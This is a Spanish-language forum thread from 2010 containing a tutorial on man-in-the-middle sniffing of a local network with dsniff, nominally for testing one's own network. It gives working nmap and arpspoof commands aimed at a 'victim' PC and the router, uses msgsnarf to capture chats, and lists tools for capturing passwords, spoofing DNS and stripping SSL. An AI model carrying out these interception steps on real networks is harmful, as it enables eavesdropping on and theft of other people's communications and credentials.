PDA

Ver la versión completa : Sniffando redes con dsniff



fikus
12-03-2010, 18:28
Voy a explicar un poco como "sniffear" TU RED, solo para comprobar la
seguridad que tienes en tu propia red local.
usare el paquete dsniff de linux (ubuntu: sudo aptitude install dsniff )
este paquete incluye:

dsniff: capturas contraseñas sino van por SSL (aunque con el sslstrip tambien se podria)
msgsnarf: capturas de conversaciones irc y msn entre otros
arpspoof: para hacer ataque mitm
dnsspoof: redireccionar cualquier web a otro sitio
webspy: ves las paginas web que abre el pc victima
estos son los que mas he probado pero hay unos cuantos mas...
+info: http://www.bulma.net/body.phtml?nIdNoticia=928


primero de todo deberemos idenfificar las maquinas conectadas, con el nmap mismo

nmap -sP 192.168.1.0/24
pongamos que conseguimos las ips que nos interesan
IP del router: 192.168.1.1
IP del pc victima: 192.168.1.34

ahora es el momento del ataque mitm (man in the middle), lo que hace es engañar al router i a la victima para que el router crea que nosotros somo la victima y la victima crea que nosotros somos el router, eso lo haremos con arpspoof.


arpspoof -i iface -t 192.168.1.34 192.168.1.1
este engaña al pc victima


arpspoof -i iface -t 192.168.1.1 192.168.1.34
este engaña al router

ahora todo el trafico de 192.168.1.34 pasa por nosotros, ahora podemos capturar, modificar o matar conexiones

ahora solo falta comprobar, ejecuta:

msgsnarf -i iface

abre tu msn en el pc victima chatea con alguien y observa la consola :D

una vez echo el mitm puedes usar casi todos los del paquete dsniff de la misma forma que el msgsnarf, con el de capturar correo electronico o passwords es interesante usar el sslstrip, aunque no lo he probado, he leido que funciona muy bien.

espero que le sirva a alguien y que no me haya dejado nada basico

j8k6f4v9j
13-03-2010, 01:55
http://monkey.org/~dugsong/dsniff/


Salu2